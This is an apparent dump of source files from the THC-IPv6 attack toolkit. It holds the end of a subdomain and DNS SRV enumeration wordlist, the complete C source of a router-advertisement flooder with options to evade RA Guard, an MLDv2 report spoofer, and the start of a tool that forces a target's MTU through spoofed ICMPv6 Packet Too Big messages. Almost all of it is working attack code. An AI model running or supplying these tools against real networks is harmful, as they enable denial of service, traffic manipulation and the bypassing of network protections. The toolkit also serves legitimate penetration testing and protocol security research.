"wd18", "wd19", "wd2", "wd20", "wd21", "wd22", "wd23", "wd24", "wd25", "wd26", "wd27", "wd28", "wd29", "wd3", "wd30", "wd31", "wd32", "wd33", "wd34", "wd35", "wd36", "wd37", "wd38", "wd39", "wd4", "wd40", "wd41", "wd42", "wd43", "wd44", "wd45", "wd46", "wd47", "wd48", "wd49", "wd5", "wd50", "wd51", "wd52", "wd53", "wd54", "wd55", "wd56", "wd57", "wd58", "wd59", "wd6", "wd60", "wd61", "wd62", "wd63", "wd64", "wd65", "wd66", "wd67", "wd68", "wd69", "wd7", "wd70", "wd71", "wd72", "wd73", "wd74", "wd75", "wd76", "wd77", "wd78", "wd79", "wd8", "wd80", "wd81", "wd82", "wd83", "wd84", "wd85", "wd86", "wd87", "wd88", "wd89", "wd9", "wd90", "wd91", "wd92", "wd93", "wd94", "wd95", "wd96", "wd97", "wd98", "wd99", "wds", "we", "weasel", "weather", "web", "web-01", "web-02", "web-1", "web-2", "web-wap", "web-wap2", "web0", "web01", "web02", "web03", "web04", "web05", "web06", "web07", "web08", "web09", "web1", "web10", "web11", "web12", "web13", "web14", "web15", "web16", "web17", "web18", "web19", "web2", "web20", "web21", "web22", "web23", "web24", "web25", "web26", "web27", "web28", "web29", "web3", "web30", "web31", "web32", "web4", "web5", "web6", "web7", "web8", "web9", "webaccess", "webadmin", "webadvisor", "webalizer", "webapp", "webapp1", "webapps", "webapps03", "webauth", "webb", "webboard", "webcache", "webcam", "webcam1", "webcam2", "webcast", "webchat", "webcon", "webconf", "webct", "webdav", "webdb", "webdemo", "webdev", "webdev1", "webdocs", "weber", "webfarm", "webfilter", "webftp", "webgate", "webhelp", "webhost", "webhost1", "webhost2", "webhosting", "weblib", "weblog", "weblogic", "webmail", "webmail01", "webmail02", "webmail1", "webmail2", "webmail3", "webmail4", "webmaster", "webmin", "webportal", "webproxy", "webqa", "webring", "webs", "websense", "webserv", "webserv1", "webserver", "webserver01", "webserver1", "webserver2", "webserver3", "webservice", "webservices", "webshield", "webshop", "website", "websites", "websphere", "websrv", "websrv01", "websrv1", "websrvr", "webstats", "webster", "webstore", "websvr", "webtest", "webtest01", "webtrends", "webvpn", "webwork", "wedge", "weed", "wega", "weiss", "welcome", "welcome1", "welcome2", "welcome3", "welcome4", "well", "wellington", "wells", "wendy", "werner", "wes", "wesley", "west", "westvirginia", "wet", "wf", "wg", "wh", "wh1", "whale", "what", "whatever", "whatsup", "wheat", "wheel", "when", "whiskey", "whisky", "whisper", "whistle", "whistler", "white", "whitney", "whm", "who", "whois", "wholesale", "why", "wi", "wichita", "wide", "widget", "widgets", "wien", "wiener", "wif", "wifi", "wifi1", "wifi2", "wiggum", "wigner", "wii", "wiki", "wilbur", "wild", "wildcard", "wildcat", "wililiam", "will", "william", "williams", "willie", "willing", "willow", "willy", "wilma", "wilson", "win", "win01", "win02", "win1", "win2", "win2000", "win2003", "win2008", "win2k", "win2k3", "win2k8", "win3", "win4", "win7", "wind", "window", "windows", "windows01", "windows02", "windows1", "windows2", "windows2000", "windows2003", "windows2008", "windows7", "windowsvista", "windowsxp", "wine", "wing", "wingate", "winner", "winnie", "winnt", "winproxy", "wins", "winserve", "winston", "winter", "wintermute", "winxp", "wire", "wired", "wireless", "wireless1", "wireless2", "wisconsin", "wisdom", "wise", "wish", "witty", "wizard", "wj", "wk", "wl", "wlan", "wlan-ap1-dynamic", "wlan-ce1-dynamic", "wlan-sw1-dynamic", "wlan1", "wlan2", "wlan6", "wlc", "wm", "wm1", "wm2", "wmail", "wms", "wn", "wo", "wolf", "wolfgang", "wolverine", "wombat", "wonder", "wonderful", "wont", "wood", "woodpecker", "woods", "woodstock", "woody", "wopr", "word", "wordpress", "worf", "work", "worker", "workflow", "workplace", "works", "workshop", "workspace", "workstation", "world", "worm", "wormhole", "worth", "worthwhile", "wotan", "wow", "wowza", "wp", "wp1", "wpad", "wq", "wr", "wraith", "wren", "wrench", "wright", "write", "writer", "writing", "wrt", "ws", "ws0", "ws01", "ws02", "ws03", "ws04", "ws05", "ws06", "ws07", "ws08", "ws09", "ws1", "ws10", "ws11", "ws12", "ws13", "ws14", "ws15", "ws16", "ws17", "ws18", "ws19", "ws2", "ws20", "ws21", "ws22", "ws23", "ws24", "ws25", "ws26", "ws27", "ws28", "ws29", "ws3", "ws30", "ws31", "ws32", "ws33", "ws34", "ws35", "ws36", "ws37", "ws38", "ws39", "ws4", "ws40", "ws41", "ws42", "ws43", "ws44", "ws45", "ws46", "ws47", "ws48", "ws49", "ws5", "ws50", "ws51", "ws52", "ws53", "ws54", "ws55", "ws56", "ws57", "ws58", "ws59", "ws6", "ws60", "ws61", "ws62", "ws63", "ws64", "ws65", "ws66", "ws67", "ws68", "ws69", "ws7", "ws70", "ws71", "ws72", "ws73", "ws74", "ws75", "ws76", "ws77", "ws78", "ws79", "ws8", "ws80", "ws81", "ws82", "ws83", "ws84", "ws85", "ws86", "ws87", "ws88", "ws89", "ws9", "ws90", "ws91", "ws92", "ws93", "ws94", "ws95", "ws96", "ws97", "ws98", "ws99", "wsm", "wss", "wsus", "wt", "wtf", "wts", "wu", "wug", "wusage", "wv", "ww", "ww0", "ww00", "ww01", "ww02", "ww03", "ww1", "ww2", "ww3", "ww4", "ww5", "www", "www-", "www-0", "www-00", "www-01", "www-02", "www-03", "www-1", "www-2", "www-3", "www-6", "www-a", "www-dev", "www-int", "www-ipv6", "www-new", "www-old", "www-test", "www-v6", "www-v6v4", "www0", "www00", "www01", "www02", "www03", "www04", "www05", "www06", "www07", "www08", "www1", "www10", "www11", "www12", "www13", "www14", "www15", "www16", "www17", "www18", "www19", "www2", "www20", "www21", "www22", "www23", "www24", "www25", "www26", "www27", "www28", "www29", "www3", "www30", "www31", "www32", "www33", "www34", "www35", "www36", "www37", "www38", "www4", "www40", "www41", "www42", "www5", "www50", "www51", "www6", "www6test", "www7", "www8", "www9", "wwwchat", "wwwdev", "wwwipv6", "wwwmail", "wwwmg", "wwwold", "wwwqa", "wwwqamg", "wwws", "wwwtest", "wwwtest6", "wwwtst", "wwwv6", "wwww", "wx", "wy", "wyoming", "wyvern", "wz", "x", "x-ray", "x1", "x10", "x11", "x12", "x13", "x14", "x15", "x2", "x21", "x22", "x23", "x24", "x25", "x3", "x4", "x5", "x6", "x7", "x8", "x9", "xa", "xanadu", "xanthus", "xavier", "xb", "xbox", "xc", "xchange", "xcii", "xd", "xdmcp", "xe", "xe-0-0-0", "xe-0-1-0", "xe-0-2-0", "xe-0-2-0-0", "xe-0-3-0", "xe-1-0-0", "xe-1-1-0", "xe-1-2-0-0", "xe-1-3-0", "xe-2-0-0", "xe-2-1-0", "xe-3-0-0", "xen", "xen01", "xen02", "xen03", "xen1", "xen2", "xen3", "xen4", "xen5", "xena", "xenapp", "xenon", "xeon", "xerox", "xerxes", "xf", "xfer", "xg", "xh", "xi", "xj", "xk", "xl", "xlogan", "xm", "xmail", "xml", "xml1", "xmpp", "xmpp-client", "xmpp-server", "xn", "xnet", "xo", "xp", "xpilot", "xq", "xr", "xray", "xs", "xserve", "xserve1", "xserve2", "xserver", "xt", "xtel", "xtell", "xu", "xv", "xw", "xx", "xxx", "xy", "xyz", "xz", "y", "y1", "ya", "yahoo", "yak", "yam", "yamato", "yang", "yankee", "yavin", "yb", "yc", "yd", "ye", "year", "yellow", "yellowstone", "yes", "yeti", "yew", "yf", "yg", "yggdrasil", "yh", "yi", "yin", "yj", "yk", "yl", "ym", "ymir", "yn", "yo", "yoda", "yogi", "york", "yosemite", "yoshi", "you", "young", "your", "youth", "yp", "yq", "yr", "ys", "yt", "yts", "yts1", "yts2", "yttrium", "yu", "yucca", "yuki", "yukon", "yum", "yuri", "yv", "yw", "yx", "yy", "yz", "z", "z-atman", "z-log", "z-tpnetu", "z1", "z2", "z3", "z3950", "za", "zabbix", "zap", "zaphod", "zapp", "zappa", "zarafa", "zb", "zc", "zcs", "zd", "ze", "zealous", "zebra", "zebrasrv", "zed", "zelda", "zen", "zenith", "zeno", "zenon", "zenoss", "zephyr", "zeppelin", "zeppo", "zera", "zerberus", "zero", "zeta", "zeus", "zeus2", "zf", "zg", "zh", "zi", "ziggy", "zim", "zimbra", "zimbra1", "zinc", "zion", "zip", "zippy", "zircon", "zirconium", "zix01", "zixgateway01", "zixvpm", "zixvpm01", "zixvpm02", "zj", "zk", "zl", "zlog", "zm", "zmail", "zn", "zo", "zodiac", "zoe", "zoidberg", "zombie", "zone", "zoo", "zoom", "zoot", "zope", "zorro", "zp", "zq", "zr", "zs", "zserv", "zt", "zu", "zulu", "zurich", "zuse", "zuul", "zv", "zvs", "zw", "zx", "zy", "zz", "" }; char *sub_srv_test[] = { "_1password", "_abi-instrument", "_xmpp-server", "_xmpp-client", "_http", "_https", "_sip", "_sips", "_hydra", "_hyperstream", "_iax", "_foo", "_pop3", "_imap", "_abc", "_zzz", "" }; char *sub_srv[] = { "_1password", "_abi-instrument", "_accessdata-f2d", "_accessdata-f2w", "_accessone", "_accountedge", "_acrobatsrv", "_actionitems", "_activeraid", "_activeraid-ssl", "_addressbook", "_adisk", "_adobe-vc", "_adpro-setup", "_a-d-sync", "_aecoretech", "_aeroflex", "_afpovertcp", "_airport", "_airprojector", "_airsharing", "_airsharingpro", "_amba-cam", "_amiphd-p2p", "_animobserver", "_animolmd", "_anquetsync", "_appelezvous", "_apple-ausend", "_apple-midi", "_applerdbg", "_apple-sasl", "_appletv", "_appletv-itunes", "_appletv-pair", "_aquamon", "_asr", "_astnotify", "_astralite", "_async", "_atlassianapp", "_auth", "_autodiscover", "_av", "_axis-video", "_b3d-convince", "_babyphone", "_bdsk", "_beacon", "_beamer", "_beatpack", "_beep", "_bfagent", "_bigbangchess", "_bigbangmancala", "_bittorrent", "_blackbook", "_bluevertise", "_bookworm", "_bootps", "_boundaryscan", "_bousg", "_bri", "_bsqdea", "_busycal", "_caltalk", "_cardsend", "_cctv", "_cheat", "_chess", "_chfts", "_chili", "_cip4discovery", "_clipboard", "_clique", "_clscts", "_collection", "_com-ocs-es-mcc", "_contactserver", "_corroboree", "_cpnotebook2", "_cvspserver", "_cw-codetap", "_cw-dpitap", "_cw-oncetap", "_cw-powertap", "_cytv", "_daap", "_dacp", "_dancepartner", "_dataturbine", "_device-info", "_difi", "_disconnect", "_distcc", "_dist-opencl", "_ditrios", "_divelogsync", "_dltimesync", "_dns-llq", "_dns-sd", "_dns-update", "_domain", "_dop", "_dossier", "_dpap", "_dropcopy", "_dsl-sync", "_dtrmtdesktop", "_dvbservdsc", "_dxtgsync", "_ea-dttx-poker", "_earphoria", "_eb-amuzi", "_ebms", "_ebreg", "_ecbyesfsgksc", "_ecms", "_edcp", "_egistix", "_eheap", "_embrace", "_ep", "_eppc", "_erp-scale", "_esp", "_eucalyptus", "_eventserver", "_evs-notif", "_ewalletsync", "_example", "_exb", "_exec", "_extensissn", "_eyetvsn", "_facespan", "_fairview", "_faxstfx", "_feed-sharing", "_firetask", "_fish", "_fix", "_fjork", "_fl-purr", "_fmpro-internal", "_fmserver-admin", "_fontagentnode", "_foxtrot-serv", "_foxtrot-start", "_frameforge-lic", "_freehand", "_frog", "_ftp", "_ftpcroco", "_fv-cert", "_fv-key", "_fv-time", "_garagepad", "_gbs-smp", "_gbs-stp", "_gforce-ssmp", "_glasspad", "_glasspadserver", "_glrdrvmon", "_gpnp", "_grillezvous", "_growl", "_guid", "_h323", "_h323cs", "_h323ls", "_helix", "_help", "_hg", "_hinz", "_hmcp", "_homeauto", "_home-sharing", "_honeywell-vid", "_hotwayd", "_howdy", "_hpr-bldlnx", "_hpr-bldwin", "_hpr-db", "_hpr-rep", "_hpr-toollnx", "_hpr-toolwin", "_hpr-tstlnx", "_hpr-tstwin", "_hs-off", "_htsp", "_http", "_https", "_hydra", "_hyperstream", "_iax", "_ibiz", "_ican", "_ica-networking", "_ichalkboard", "_ichat", "_iconquer", "_idata", "_idcws", "_idsync", "_ifolder", "_ihouse", "_ii-drills", "_ii-konane", "_ilynx", "_imap", "_imaps", "_imidi", "_indigo-dvr", "_inova-ontrack", "_ipbroadcaster", "_ipp", "_ipspeaker", "_irelay", "_irmc", "_iscsi", "_ishare", "_isparx", "_ispq-vc", "_isticky", "_istorm", "_itis-device", "_itsrc", "_ivef", "_iwork", "_jcan", "_jabber", "_jabber-conference", "_jeditx", "_jini", "_jtag", "_kerberos", "_kerberos-adm", "_kerberos-iv", "_kerberos-master", "_kpasswd", "_ktp", "_labyrinth", "_lan2p", "_lanrevagent", "_lanrevserver", "_lapse", "_ldap", "_leaf", "_lexicon", "_liaison", "_library", "_llrp", "_llrp-secure", "_lobby", "_logicnode", "_login", "_lonbridge", "_lontalk", "_lonworks", "_lsys-appserver", "_lsys-camera", "_lsys-ezcfg", "_lsys-oamp", "_lux-dtp", "_lxi", "_lyrics", "_macfoh", "_macfoh-admin", "_macfoh-audio", "_macfoh-data", "_macfoh-db", "_macfoh-events", "_macfoh-remote", "_macminder", "_maestro", "_magicdice", "_mandos", "_matrix", "_mbconsumer", "_mbproducer", "_mbserver", "_mconnect", "_mcrcp", "_mediaboard1", "_mesamis", "_mimer", "_mi-raysat", "_modolansrv", "_moneysync", "_moneyworks", "_moodring", "_mother", "_movieslate", "_mp3sushi", "_mqtt", "_mslingshot", "_mttp", "_mumble", "_musicmachine", "_mxim-art2", "_mxim-ice", "_mxs", "_mysync", "_ncbroadcast", "_ncdirect", "_ncsyncserver", "_neoriders", "_net2display", "_net-assistant", "_netrestore", "_newton-dock", "_nfs", "_nicname", "_nssocketport", "_ntlx-arch", "_ntlx-ent", "_ntlx-video", "_ntp", "_ntx", "_obf", "_objective", "_oce", "_odabsharing", "_odisk", "_od-master", "_officetime-sync", "_ofocus-conf", "_ofocus-sync", "_olpc-activity1", "_oma-bcast-sg", "_omni-bookmark", "_omni-live", "_openbase", "_opencu", "_oprofile", "_oscit", "_ovready", "_owhttpd", "_owserver", "_p2pchat", "_panoply", "_parabay-p2p", "_parentcontrol", "_parliant", "_passwordwallet", "_pcast", "_pdl-datastream", "_pgpkey-hkp", "_pgpkey-http", "_pgpkey-https", "_pgpkey-ldap", "_pgpkey-mailto", "_photoparata", "_pictua", "_piesync", "_piu", "_poch", "_pokeeye", "_pop3", "_pop3s", "_postgresql", "_powereasy-erp", "_powereasy-pos", "_pplayer-ctrl", "_presence", "_print-caps", "_printer", "_printer._sub._http", "_profilemac", "_prolog", "_protonet", "_psap", "_psia", "_ptnetprosrv2", "_ptp", "_ptp-req", "_puzzle", "_qbox", "_qttp", "_quinn", "_radioepg", "_radiotag", "_radiovis", "_rakket", "_raop", "_rbr", "_rce", "_rdp", "_realplayfavs", "_recipe", "_remote", "_remoteburn", "_renderpipe", "_rendezvouspong", "_renkara-sync", "_resacommunity", "_resol-vbus", "_retrospect", "_rfb", "_rfbc", "_rfid", "_riousbprint", "_roku-rcp", "_rql", "_rsmp-server", "_rsync", "_rtsp", "_rubygems", "_safarimenu", "_sallingbridge", "_sallingclicker", "_salutafugijms", "_sandvox", "_scanner", "_sc-golf", "_schick", "_scone", "_scpi-raw", "_scpi-telnet", "_sdsharing", "_see", "_seeCard", "_senteo-http", "_sentillion-vlc", "_sentillion-vlt", "_sepvsync", "_serendipd", "_servereye", "_servermgr", "_services", "_sessionfs", "_sflow", "_sftp-ssh", "_sge-exec", "_sge-qmaster", "_shell", "_shifter", "_shipsgm", "_shipsinvit", "_shoppersync", "_shoutcast", "_simmon", "_simusoftpong", "_sip", "_sips", "_sipuri", "_sironaxray", "_skype", "_sleep-proxy", "_slimcli", "_slimhttp", "_smartenergy", "_smb", "_sms", "_soap", "_socketcloud", "_souschef", "_sox", "_sparechange", "_sparql", "_spearcat", "_spike", "_spincrisis", "_splashsync", "_spl-itunes", "_spr-itunes", "_ssh", "_ssscreenshare", "_stanza", "_stickynotes", "_strateges", "_submission", "_supple", "_surveillus", "_svn", "_swcards", "_switcher", "_swordfish", "_sxqdea", "_sybase-tds", "_syncopation", "_syncqdea", "_synergy", "_synksharing", "_taccounting", "_tango", "_tapinoma-ecs", "_taskcoachsync", "_tbricks", "_tcode", "_tcu", "_teamlist", "_te-faxserver", "_teleport", "_telnet", "_tera-fsmgr", "_tera-mp", "_tf-redeye", "_tftp", "_thumbwrestling", "_ticonnectmgr", "_timbuktu", "_tinavigator", "_tivo-hme", "_tivo-music", "_tivo-photos", "_tivo-remote", "_tivo-videos", "_todogwa", "_tomboy", "_toothpicserver", "_touch-able", "_touch-remote", "_tri-vis-client", "_tri-vis-server", "_tryst", "_tt4inarow", "_ttcheckers", "_ttp4daemon", "_tunage", "_tuneranger", "_ubertragen", "_uddi", "_uddi-inq", "_uddi-pub", "_uddi-sec", "_uddi-sub", "_upnp", "_urlbookmark", "_uswi", "_utest", "_uwsgi", "_ve-decoder", "_ve-encoder", "_ve-recorder", "_visel", "_volley", "_vos", "_vue4rendercow", "_vxi-11", "_walkietalkie", "_webdav", "_webdavs", "_webissync", "_wedraw", "_we-jell", "_whamb", "_whistler", "_wired", "_witap", "_witapvoice", "_wkgrpsvr", "_workgroup", "_workstation", "_wormhole", "_writietalkie", "_ws", "_wtc-heleos", "_wtc-qels", "_wtc-rex", "_wtc-viscostar", "_wtc-wpr", "_wwdcpic", "_xcodedistcc", "_xgate-rmi", "_xgrid", "_xmms2", "_xmp", "_xmpp-client", "_xmpp-server", "_x-on", "_x-plane9", "_xsanclient", "_xsanserver", "_xsansystem", "_xserveraid", "_xsync", "_xtimelicence", "_xtshapro", "_xul-http", "_yakumo", "" }; thc-ipv6-2.5/flood_router6.c0000644000000000000000000001047012251022437014453 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-HFD] interface\n\n", prg); printf("Flood the local network with router advertisements.\n"); printf("-F/-D/-H add fragment/destination/hopbyhop header to bypass RA guard security.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *routerip6, *route6, *mac6 = mac, *ip6; unsigned char buf[56], buf2[6], buf3[1504]; unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst); int size, mtu, i, type = NXT_ICMP6; unsigned char *pkt = NULL; int pkt_len = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, cnt, do_dst = 0, offset = 14; thc_ipv6_hdr *hdr = NULL; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); printf("!\n! Please note: flood_router6 is deprecated, please use flood_router26!\n!\n\n"); while ((i = getopt(argc, argv, "DFHr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[optind]; mtu = 1500; size = 64; ip6 = malloc(16); routerip6 = malloc(16); route6 = malloc(16); if (do_hdr_size) offset = do_hdr_size; mac[0] = 0x00; mac[1] = 0x18; memset(ip6, 0, 16); ip6[0] = 0xfe; ip6[1] = 0x80; ip6[8] = 0x02; ip6[9] = mac[1]; ip6[11] = 0xff; ip6[12] = 0xfe; routerip6[0] = 0x2a; routerip6[1] = 0x01; routerip6[15] = 0x01; memset(route6 + 8, 0, 8); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); memset(buf, 0, sizeof(buf)); buf[1] = 250; buf[5] = 30; buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; buf[16] = 3; buf[17] = 4; buf[18] = size; buf[19] = 128 + 64 + 32; memset(&buf[20], 255, 8); buf[48] = 1; buf[49] = 1; printf("Starting to flood network with router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 2; i < 6; i++) mac[i] = rand() % 256; for (i = 2; i < 8; i++) routerip6[i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; memcpy(route6, routerip6, 8); memcpy(&buf[32], route6, 16); memcpy(&buf[50], mac6, 6); count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i < do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff08ffff, buf, sizeof(buf), 0) < 0) return -1; if (do_dst) { thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, ip6, dst, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); } else { if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { printf("!"); // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; } } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/fake_mld26.c0000644000000000000000000001473012251022435013575 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" int rawmode = 0; char *multicast6 = NULL; int empty = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-l] interface add|delete|query [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]]\n\n", prg); printf("This uses the MLDv2 protocol. Only a subset of what the protocol is able to\n"); printf("do is possible to implement via a command line. Code it if you need something.\n"); printf("Ad(d)vertise or delete yourself - or anyone you want - in a multicast group of your choice\n"); printf("Query ask on the network who is listening to multicast addresses\n"); printf("Use -l to loop and send (in 5s intervals) until Control-C is pressed.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ptr = (unsigned char *) data; int i, j = 0, offset = 56, len = header->caplen; if (rawmode == 0) { ptr += 14; len -= 14; } if (do_hdr_size) { ptr += (do_hdr_size - 14); len -= (do_hdr_size - 14); if ((ptr[0] & 240) != 0x60) return; } if (debug) thc_dump_data(ptr, len, "Received Packet"); if (ptr[6] == 0 && ptr[40] == 0x3a && ptr[41] == 0 && ptr[42] == 5 && ptr[48] == ICMP6_MLD2_REPORT && len >= 76) if (empty == 1 || memcmp(multicast6, ptr + 60, 16) == 0) { i = ptr[55]; while (j < i) { if (ptr[offset] % 2 == 1) printf("MLD Report: %s is listening on %s\n", thc_ipv62notation(ptr + 8), thc_ipv62notation(ptr + offset + 4)); if (ptr[offset] % 2 == 0) printf("MLD Report: %s was listening on %s\n", thc_ipv62notation(ptr + 8), thc_ipv62notation(ptr + offset + 4)); j++; offset += ptr[57] * 4 + 20 + ptr[58] * 256 * 16 + ptr[59] * 16; if (offset > len - 20) // packet shorter than it should be j = i; } } if (ptr[6] == 0 && ptr[40] == 0x3a && ptr[41] == 0 && ptr[42] == 5 && ptr[48] == ICMP6_MLD_REPORT && len >= 72) if (empty == 1 || memcmp(multicast6, ptr + 56, 16) == 0) printf("MLD Report: %s is listening on %s\n", thc_ipv62notation(ptr + 8), thc_ipv62notation(ptr + 56)); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[36]; unsigned char *dst6 = NULL, *src6 = NULL, srcmac[16] = "", *mac = srcmac, dstmac[16] = "", *dmac = dstmac; int pkt1_len = 0, buflen = 36, i = 0, j; char *interface, string[64] = "ip6 and not udp and not tcp"; int ttl = 1, mode = 0, wait = 1, loop = 0, actionmode = 0; pcap_t *p; memset(buf, 0, sizeof(buf)); if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-l") == 0) { loop = 1; argv++; argc--; } if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; if (strncasecmp(argv[2], "add", 3) == 0) { mode = ICMP6_MLD2_REPORT; actionmode = 3; } if (strncasecmp(argv[2], "del", 3) == 0) { mode = ICMP6_MLD2_REPORT; actionmode = 4; } if (strncasecmp(argv[2], "que", 3) == 0) { mode = ICMP6_MLD_QUERY; wait = 0x0444 << 16; buflen = 20; } if (mode == 0) { fprintf(stderr, "Error: no mode defined, specify add, delete or query\n"); exit(-1); } if (argc == 3 || argv[3] == NULL || argv[3][0] == 0) { multicast6 = thc_resolve6("::"); empty = 1; } else { if ((multicast6 = thc_resolve6(argv[3])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[3]); exit(-1); } for (j = 0; j < 16; j++) i += multicast6[j]; if (i == 0) empty = 1; } if (argv[4] != NULL && argc > 4) dst6 = thc_resolve6(argv[4]); else if (mode == ICMP6_MLD_QUERY) { if (memcmp(multicast6, buf, 16)) dst6 = multicast6; else dst6 = thc_resolve6("ff02::1"); } else dst6 = thc_resolve6("ff02::16"); if (argv[5] != NULL && argc > 5) ttl = atoi(argv[5]); if (argv[6] != NULL && argc > 6) src6 = thc_resolve6(argv[6]); else src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK); if (rawmode == 0) { if (argv[7] != NULL && argc > 7) sscanf(argv[7], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); else mac = thc_get_own_mac(interface); if (argv[8] != NULL && argc > 8) sscanf(argv[8], "%x:%x:%x:%x:%x:%x", (unsigned int *) &dstmac[0], (unsigned int *) &dstmac[1], (unsigned int *) &dstmac[2], (unsigned int *) &dstmac[3], (unsigned int *) &dstmac[4], (unsigned int *) &dstmac[5]); else dmac = NULL; } if ((p = thc_pcap_init_promisc(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 5; buf[1] = 2; if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf, 6) < 0) return -1; memset(buf, 0, sizeof(buf)); if (mode == ICMP6_MLD_QUERY) { memcpy(buf, multicast6, 16); buf[16] = 7; buf[17] = 120; } else { buf[0] = actionmode; buf[3] = 1; memcpy(buf + 4, multicast6, 16); memcpy(buf + 20, src6, 16); } if (thc_add_icmp6(pkt1, &pkt1_len, mode, 0, wait, (unsigned char *) &buf, buflen, 0) < 0) return -1; if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Sending packet%s for %s%s\n", loop ? "s" : "", empty ? "::" : argv[3], loop ? " (Press Control-C to end)" : ""); do { thc_send_pkt(interface, pkt1, &pkt1_len); sleep(5); if (mode == ICMP6_MLD_QUERY) while (thc_pcap_check(p, (char *) check_packets, NULL)); } while (loop); return 0; // never reached } thc-ipv6-2.5/toobig6.c0000644000000000000000000000522512251022441013230 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-u] interface target-ip existing-ip mtu [hop-limit]\n\n", prg); printf("Implants the specified mtu on the target.\n"); printf("If the TTL of the target is not 64, then specify this as the last option.\n"); printf("Option -u will send the TooBig without the spoofed ping6 from existing-ip.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt = NULL, buf[65536]; unsigned char *mac6 = NULL, *src6, *target6; int rmtu, buf_len = 0, ttl = 63, offset = 14; int pkt_len = 0; thc_ipv6_hdr *ipv6; char *interface; unsigned int mtu, related = 1; if (argc > 3 && strncmp(argv[1], "-u", 2) == 0) { related = 0; argc--; argv++; } if (argc < 5 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; target6 = thc_resolve6(argv[2]); src6 = thc_resolve6(argv[3]); mtu = atoi(argv[4]); rmtu = thc_get_mtu(interface); if (do_hdr_size) offset = do_hdr_size; if (rmtu < 1280 || rmtu > 65530) { fprintf(stderr, "Error: mtu size invalid on interface %s\n", interface); exit(-1); } if (argc > 5) ttl = atoi(argv[5]); if (ttl < 0 || ttl > 255) ttl = 64; mac6 = thc_get_own_mac(interface); if (mtu > 47) buf_len = mtu - 47; if (buf_len < 0) buf_len = rmtu - 48 - offset; if (rmtu - 48 < buf_len ) buf_len = rmtu - 48; memset(buf, 'A', sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, 